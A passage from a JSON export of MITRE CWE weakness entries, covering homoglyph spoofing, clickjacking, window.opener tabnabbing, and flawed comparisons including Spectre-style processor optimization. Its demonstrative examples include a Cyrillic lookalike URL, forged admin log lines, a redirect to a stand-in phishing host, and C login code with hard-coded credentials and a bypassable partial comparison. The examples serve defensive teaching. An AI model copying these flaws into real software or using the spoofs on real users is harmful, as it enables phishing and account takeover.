displayed in exactly the same way to a user. Accent marks may also cause letters to appear very similar, such as the Latin capital letter grave mark \\"\xc0\\" and its equivalent \\"\xc0\\" with the acute accent.","Adversaries can exploit this visual similarity for attacks such as phishing, e.g. by providing a link to an attacker-controlled hostname that looks like a hostname that the victim trusts. In a different use of homoglyphs, an adversary may create a back door username that is visually similar to the username of a regular user, which then makes it more difficult for a system administrator to detect the malicious username while reviewing logs."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"451","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Sometimes"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Homograph Attack","Description":"\\"Homograph\\" is often used as a synonym of \\"homoglyph\\" by researchers, but according to Wikipedia, a homograph is a word that has multiple, distinct meanings."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may occur when characters from various character sets are allowed to be interchanged within a URL, username, email address, etc. without any notification to the user or underlying system being used."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":"Other","Note":"An attacker may ultimately redirect a user to a malicious website, by deceiving the user into believing the URL they are accessing is a trusted domain. However, the attack can also be used to forge log entries by using homoglyphs in usernames. Homoglyph manipulations are often the first step towards executing advanced attacks such as stealing a user\'s credentials, Cross-Site Scripting (XSS), or log forgery. If an attacker redirects a user to a malicious site, the attacker can mimic a trusted domain to steal account credentials and perform actions on behalf of the user, without the user\'s knowledge. Similarly, an attacker could create a username for a website that contains homoglyph characters, making it difficult for an admin to review logs and determine which users performed which actions."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Dynamic Analysis","Description":"If utilizing user accounts, attempt to submit a username that contains homoglyphs. Similarly, check to see if links containing homoglyphs can be sent via email, web browsers, or other mechanisms.","Effectiveness":"Moderate"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":{"xhtml:p":["Use a browser that displays Punycode for IDNs in the URL and status bars, or which color code various scripts in URLs.","Due to the prominence of homoglyph attacks, several browsers now help safeguard against this attack via the use of Punycode. For example, Mozilla Firefox and Google Chrome will display IDNs as Punycode if top-level domains do not restrict which characters can be used in domain names or if labels mix scripts for different languages."]}},{"Phase":"Implementation","Description":{"xhtml:p":["Use an email client that has strict filters and prevents messages that mix character sets to end up in a user\'s inbox.","Certain email clients such as Google\'s GMail prevent the use of non-Latin characters in email addresses or in links contained within emails. This helps prevent homoglyph attacks by flagging these emails and redirecting them to a user\'s spam folder."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following looks like a simple, trusted URL that a user may frequently access.","Example_Code":{"attr":{"@_Nature":"attack"},"xhtml:div":"http://www.\u0435x\u0430m\u0440l\u0435.\u0441\u043em"},"Body_Text":"However, the URL above is comprised of Cyrillic characters that look identical to the expected ASCII characters. This results in most users not being able to distinguish between the two and assuming that the above URL is trusted and safe. The \\"e\\" is actually the \\"CYRILLIC SMALL LETTER IE\\" which is represented in HTML as the character &amp;#x0435, while the \\"a\\" is actually the \\"CYRILLIC SMALL LETTER A\\" which is represented in HTML as the character &amp;#x0430.  The \\"p\\", \\"c\\", and \\"o\\" are also Cyrillic characters in this example. Viewing the source reveals a URL of \\"http://www.&amp;#x0435;x&amp;#x0430;m&amp;#x0440;l&amp;#x0435;.&amp;#x0441;&amp;#x043e;m\\". An adversary can utilize this approach to perform an attack such as a phishing attack in order to drive traffic to a malicious website."},{"Intro_Text":"The following displays an example of how creating usernames containing homoglyphs can lead to log forgery.","Body_Text":["Assume an adversary visits a legitimate, trusted domain and creates the account \\"admin\\" where the \'a\' and \'i\' characters are Cyrillic characters instead of the expected ACII. Any actions the adversary performs will be saved to the log file and look like they came from a legitimate administrator account.","However, upon closer inspection, the account that generated these log entries is \\"&amp;#x0430;dm&amp;#x0456;n\\". This makes it more difficult to determine which actions were performed by the adversary and which actions were executed by the legitimate \\"admin\\" account."],"Example_Code":{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:05:49 -0400] \\"GET /example/users/userlist HTTP/1.1\\" 401 12846123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:06:51 -0400] \\"GET /example/users/userlist HTTP/1.1\\" 200 4523123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291123.123.123.123 \u0430dm\u0456n [17/Jul/2017:09:10:02 -0400] \\"GET /example/users/editusers HTTP/1.1\\" 200 6291","xhtml:br":["","","","",""]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-7236","Description":"web forum allows impersonation of users with homoglyphs in account names","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7236"},{"Reference":"CVE-2012-0584","Description":"Improper character restriction in URLs in web browser","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0584"},{"Reference":"CVE-2009-0652","Description":"Incomplete denylist does not include homoglyphs of \\"/\\" and \\"?\\" characters in URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0652"},{"Reference":"CVE-2017-5015","Description":"web browser does not convert hyphens to punycode, allowing IDN spoofing in URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5015"},{"Reference":"CVE-2005-0233","Description":"homoglyph spoofing using punycode in URLs and certificates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0233"},{"Reference":"CVE-2005-0234","Description":"homoglyph spoofing using punycode in URLs and certificates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0234"},{"Reference":"CVE-2005-0235","Description":"homoglyph spoofing using punycode in URLs and certificates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0235"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, &#34;Canonical Representation Issues&#34;, Page 382"}},{"attr":{"@_External_Reference_ID":"REF-8"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2017-07-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples, Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Demonstrative_Examples, Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"}]}},"1021":{"attr":{"@_ID":"1021","@_Name":"Improper Restriction of Rendered UI Layers or Frames","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not restrict or incorrectly restricts frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with.","Extended_Description":"A web application is expected to place restrictions on whether it is allowed to be rendered within frames, iframes, objects, embed or applet elements. Without the restrictions, users can be tricked into interacting with the application when they were not intending to.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"441","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"451","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Clickjacking"},{"Term":"UI Redress Attack"},{"Term":"Tapjacking","Description":"\\"Tapjacking\\" is similar to clickjacking, except it is used for mobile applications in which the user \\"taps\\" the application instead of performing a mouse click."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Application Data","Modify Application Data"],"Note":"An attacker can trick a user into performing actions that are masked and hidden from the user\'s view. The impact varies widely, depending on the functionality of the underlying application. For example, in a social media application, clickjacking could be used to trik the user into changing privacy settings."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":{"xhtml:p":["The use of X-Frame-Options allows developers of web content to restrict the usage of their application within the form of overlays, frames, or iFrames. The developer can indicate from which domains can frame the content.","The concept of X-Frame-Options is well documented, but implementation of this protection mechanism is in development to cover gaps. There is a need for allowing frames from multiple domains."]}},{"Phase":"Implementation","Description":{"xhtml:p":["A developer can use a \\"frame-breaker\\" script in each page that should not be framed. This is very helpful for legacy browsers that do not support X-Frame-Options security feature previously mentioned.","It is also important to note that this tactic has been circumvented or bypassed. Improper usage of frames can persist in the web application through nested frames. The \\"frame-breaking\\" script does not intuitively account for multiple nested frames that can be presented to the user."]}},{"Phase":"Implementation","Description":"This defense-in-depth technique can be used to prevent the improper usage of frames in web applications. It prioritizes the valid sources of data to be loaded into the application through the usage of declarative policies. Based on which implementation of Content Security Policy is in use, the developer should use the \\"frame-ancestors\\" directive or the \\"frame-src\\" directive to mitigate this weakness. Both directives allow for the placement of restrictions when it comes to allowing embedded content."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-7440","Description":"E-mail preview feature in a desktop application allows clickjacking attacks via a crafted e-mail message","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7440"},{"Reference":"CVE-2017-5697","Description":"Hardware/firmware product has insufficient clickjacking protection in its web user interface","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5697"},{"Reference":"CVE-2017-4015","Description":"Clickjacking in data-loss prevention product via HTTP response header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-4015"},{"Reference":"CVE-2016-2496","Description":"Tapjacking in permission dialog for mobile OS allows access of private storage using a partially-overlapping window.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2496"},{"Reference":"CVE-2015-1241","Description":"Tapjacking in web browser related to page navigation and touch/gesture events.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1241"},{"Reference":"CVE-2017-0492","Description":"System UI in mobile OS allows a malicious application to create a UI overlay of the entire screen to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0492"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"103"}},{"attr":{"@_CAPEC_ID":"181"}},{"attr":{"@_CAPEC_ID":"222"}},{"attr":{"@_CAPEC_ID":"504"}},{"attr":{"@_CAPEC_ID":"506"}},{"attr":{"@_CAPEC_ID":"654"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-35"}},{"attr":{"@_External_Reference_ID":"REF-36"}},{"attr":{"@_External_Reference_ID":"REF-37"}},{"attr":{"@_External_Reference_ID":"REF-38"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2017-08-01"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1022":{"attr":{"@_ID":"1022","@_Name":"Use of Web Link to Untrusted Target with window.opener Access","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application produces links to untrusted external sites outside of its sphere of control, but it does not properly prevent the external site from modifying  security-critical properties of the window.opener object, such as the location property.","Extended_Description":"When a user clicks a link to an external site (\\"target\\"), the target=\\"_blank\\" attribute causes the target site\'s contents to be opened in a new window or tab, which runs in the same process as the original page. The window.opener object records information about the original page that offered the link.  If an attacker can run script on the target page, then they could read or modify certain properties of the window.opener object, including the location property - even if the original and target site are not the same origin.  An attacker can modify the location property to automatically redirect the user to a malicious site, e.g. as part of a phishing attack. Since this redirect happens in the original window/tab - which is not necessarily visible, since the browser is focusing the display on the new target page - the user might not notice any suspicious redirection.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"JavaScript","@_Prevalence":"Often"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Often"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"tabnabbing"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness is introduced during the design of an application when the architect does not specify that a linked external document should not be able to alter the location of the calling page."},{"Phase":"Implementation","Note":"This weakness is introduced during the coding of an application when the developer does not include the noopener and/or noreferrer value for the rel attribute."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Alter Execution Logic","Note":"The user may be redirected to an untrusted page that contains undesired content or malicious script code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Specify in the design that any linked external document must not be granted access to the location object of the calling page."},{"Phase":"Implementation","Description":{"xhtml:p":["When creating a link to an external document using the &lt;a&gt; tag with a defined target, for example \\"_blank\\" or a named frame, provide the rel attribute with a value \\"noopener noreferrer\\".","If opening the external document in a new window via javascript, then reset the opener by setting it equal to null."]}},{"Phase":"Implementation","Description":{"xhtml:p":"Do not use \\"_blank\\" targets. However, this can affect the usability of the application."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, the application opens a link in a named window/tab without taking precautions to prevent the called page from tampering with the calling page\'s location in the browser.","Body_Text":["There are two ways that this weakness is commonly seen. The first is when the application generates an &lt;a&gt; tag is with target=\\"_blank\\" to point to a target site:","If the attacker offers a useful page on this link (or compromises a trusted, popular site), then a user may click on this link.  However, the attacker could use scripting code to modify the window.opener\'s location property to redirect the application to a malicious, attacker-controlled page - such as one that mimics the look and feel of the original application and convinces the user to re-enter authentication credentials, i.e. phishing:","To mitigate this type of weakness, some browsers support the \\"rel\\" attribute with a value of \\"noopener\\", which sets the window.opener object equal to null. Another option is to use the \\"rel\\" attribute with a value of \\"noreferrer\\", which in essence does the same thing.","A second way that this weakness is commonly seen is when opening a new site directly within JavaScript. In this case, a new site is opened using the window.open() function.","To mitigate this, set the window.opener object to null."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":"&lt;a href=\\"http://attacker-site.example.com/useful-page.html\\" target=\\"_blank\\"&gt;"},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.opener.location = \'http://phishing.example.org/popular-bank-page\';"},{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":"&lt;a href=\\"http://attacker-site.example.com/useful-page.html\\" target=\\"_blank\\" rel=\\"noopener noreferrer\\"&gt;"},{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":"var newWindow = window.open(\\"http://attacker-site.example.com/useful-page.html\\", \\"_blank\\");"},{"attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:div":{"#text":"var newWindow = window.open(\\"http://attacker-site.example.com/useful-page.html\\", \\"_blank\\");newWindow.opener = null;","xhtml:br":""}}]}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-39"}},{"attr":{"@_External_Reference_ID":"REF-40"}},{"attr":{"@_External_Reference_ID":"REF-958"}}]},"Content_History":{"Submission":{"Submission_Name":"David Deatherage","Submission_Organization":"Silicon Valley Bank","Submission_Date":"2017-09-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Improper Restriction of Cross-Origin Permission to window.opener.location","attr":{"@_Date":"2018-03-27"}}}},"1023":{"attr":{"@_ID":"1023","@_Name":"Incomplete Comparison with Missing Factors","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a comparison between entities that must consider multiple factors or characteristics of each entity, but the comparison does not include one or more of these factors.","Extended_Description":"An incomplete comparison can lead to resultant weaknesses, e.g., by operating on the wrong object or making a security decision without considering a required factor.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control"],"Impact":["Alter Execution Logic","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-115"},"Intro_Text":"Consider an application in which Truck objects are defined to be the same if they have the same make, the same model, and were manufactured in the same year.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Truck {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String make;private String model;private int year;public boolean equals(Object o) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (o == null) return false;if (o == this) return true;if (!(o instanceof Truck)) return false;Truck t = (Truck) o;return (this.make.equals(t.getMake()) &amp;&amp; this.model.equals(t.getModel()));","xhtml:br":["","","","","",""]}}}}}},"Body_Text":"Here, the equals() method only checks the make and model of the Truck objects, but the year of manufacture is not included."},{"attr":{"@_Demonstrative_Example_ID":"DX-116"},"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv) {}","xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"if (strncmp(username, inUser, strlen(inUser))) {}if (! strncmp(pass, inPass, strlen(inPass))) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"logEvent(\\"Auth failure of username using strlen of inUser\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth success of password using strlen of inUser\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth fail of password using sizeof\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]},{"#text":"int authResult;if (argc &lt; 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}}]}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"ppapaspass","xhtml:br":["","",""]}}],"Body_Text":["In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application\'s password before determining success.","As a result, this partial comparison leads to improper authentication (CWE-287).","Any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","This significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"a\\" and \\"adm\\" will succeed for the username.","While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness."]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-01-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"1024":{"attr":{"@_ID":"1024","@_Name":"Comparison of Incompatible Types","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a comparison between two entities, but the entities are of different, incompatible types that cannot be guaranteed to provide correct results when they are directly compared.","Extended_Description":"In languages that are strictly typed but support casting/conversion, such as C or C++, the programmer might assume that casting one entity to the same type as another entity will ensure that the comparison will be performed correctly, but this cannot be guaranteed.  In languages that are not strictly typed, such as PHP or JavaScript, there may be implicit casting/conversion to a type that the programmer is unaware of, causing unexpected results; for example, the string \\"123\\" might be converted to a number type.  See examples.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-01-04"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1025":{"attr":{"@_ID":"1025","@_Name":"Comparison Using Wrong Factors","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code performs a comparison between two entities, but the comparison examines the wrong factors or characteristics of the entities, which can lead to incorrect results and resultant weaknesses.","Extended_Description":"This can lead to incorrect results and resultant weaknesses.  For example, the code might inadvertently compare references to objects, instead of the relevant contents of those objects, causing two \\"equal\\" objects to be considered unequal.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-60"},"Intro_Text":"In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String str1 = new String(\\"Hello\\");String str2 = new String(\\"Hello\\");if (str1 == str2) {}","xhtml:br":["",""],"xhtml:div":{"#text":"System.out.println(\\"str1 == str2\\");","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (str1.equals(str2)) {}","xhtml:div":{"#text":"System.out.println(\\"str1 equals str2\\");","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"However, the if statement will not be executed as the strings are compared using the \\"==\\" operator. For Java objects, such as String objects, the \\"==\\" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method:"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-01-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"1037":{"attr":{"@_ID":"1037","@_Name":"Processor Optimization Removal or Modification of Security-critical Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The developer builds a security-critical protection mechanism into the software, but the processor optimizes the execution of the program such that the mechanism is removed or modified.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1038","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This weakness does not depend on other weaknesses and is the result of choices made by the processor in executing the specified application."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Rarely"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Optimizations built into the design of the processor can have unintended consequences during the execution of an application."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Bypass Protection Mechanism","Likelihood":"High","Note":"A successful exploitation of this weakness will change the order of an application\'s execution and will likely be used to bypass specific protection mechanisms. This bypass can be exploited further to potentially read data that should otherwise be unaccessible."}},"Detection_Methods":{"Detection_Method":{"Method":"White Box","Description":"In theory this weakness can be detected through the use of white box testing techniques where specifically crafted test cases are used in conjunction with debuggers to verify the order of statements being executed.","Effectiveness":"Opportunistic","Effectiveness_Notes":"Although the mentioned detection method is theoretically possible, the use of speculative execution is a preferred way of increasing processor performance. The reality is that a large number of statements are executed out of order, and determining if any of them break an access control property would be extremely opportunistic."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-5715","Description":"Intel, ARM, and AMD processor optimizations related to speculative execution and branch prediction cause access control checks to be bypassed when placing data into the cache. Often known as \\"Spectre\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715"},{"Reference":"CVE-2017-5753","Description":"Intel, ARM, and AMD processor optimizations related to speculative execution and branch prediction cause access control checks to be bypassed when placing data into the cache. Often known as \\"Spectre\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5753"},{"Reference":"CVE-2017-5754","Description":"Intel processor optimizations related to speculative execution cause access control checks to be bypassed when placing data into the cache. Often known as \\"Meltdown\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"663"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-11"}},{"attr":{"@_External_Reference_ID":"REF-12"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-03-07"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1038":{"attr":{"@_ID":"1038","@_Name":"Insecure Automated Optimizations","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a mechanism that automatically optimizes code, e.g. to improve a characteristic such as performance, but the optimizations can have an unintended side effect that might violate an intended security 